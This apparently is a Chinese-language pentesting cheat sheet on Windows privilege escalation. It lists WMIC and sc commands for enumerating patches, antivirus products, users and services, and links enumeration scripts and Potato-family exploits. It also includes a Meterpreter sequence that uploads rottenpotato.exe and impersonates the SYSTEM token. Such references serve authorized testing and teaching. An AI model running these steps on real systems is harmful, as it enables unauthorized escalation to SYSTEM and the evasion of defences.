windows-kernel-exploits(Windows平台提权漏洞集合):
https://github.com/SecWiki/windows-kernel-exploits
WMIC信息收集
WMIC:Windows管理工具命令行,提供了从命令行接口和批命令脚本执行系统管理的支持,对于信息收集和渗
透测试是非常实用的。
wmic信息提取脚本:wmic_info.bat
提取进程、服务、用户帐号、用户组、网络接口、硬盘信息、网络共享信息、安装Windows补丁、程序在启动运
行、安装的软件列表、操作系统、时区等信息。
补丁信息、补丁包过滤
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:“KBxxxxxx”
获取杀软名:
WMIC /Node:localhost /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName
/Format:List
获取杀软名和安装路径:
WMIC /namespace:\root\securitycenter2 path antivirusproduct GET displayName,productState,
pathToSignedProductExe
wmic group
组帐户管理。
wmic os
已安装操作系统的管理。
wmic process
进程管理
wmic service
服务应用程序管理。
WMIC信息收集
02
Windows提权信息收集
wmic useraccount
用户帐户管理。
wmic startup
当用户登录到计算机系统时自动运行的命令的管理。
wmic nic
网络接口控制器(NIC)管理
03sc信息收集
SC:用来与服务控制管理器和服务进行通信的命令行程序,检索和设置有关服务的控制信息,测试和调试服务程
序,检索服务状态或运行、停止服务,类似于控制面板-管理工具-服务(services.msc)
获取系统注册服务信息:
sc query state= all
04自动信息收集
Host Information Gathering Script:HIGS.bat
https://github.com/myh0st/scripts/blob/master/Windows%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/HIGS.bat
privilege-escalation-awesome-scripts:winPEAS.bat
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASbat/winPEAS.bat
https://github.com/M4ximuss/Powerless
提权工具脚本
RottenPotato:
将服务帐户本地提权至SYSTEM
load incognito
list_tokens –u
upload /root/rottenpotato.exe .
execute -Hc -f rottenpotato.exe
impersonate_token “NT AUTHORITY\SYSTEM”
将SYSTEM token添加到impersonate user tokens下
Origin Potato :
https://github.com/foxglovesec/Potato
RottenPotato & JuicyPotato:
https://github.com/ohpe/juicy-potato
RoguePotato:
https://github.com/antonioCoco/RoguePotato
SweetPotato:
https://github.com/CCob/SweetPotato
https://github.com/uknowsec/SweetPotato
https://github.com/uknowsec/getSystem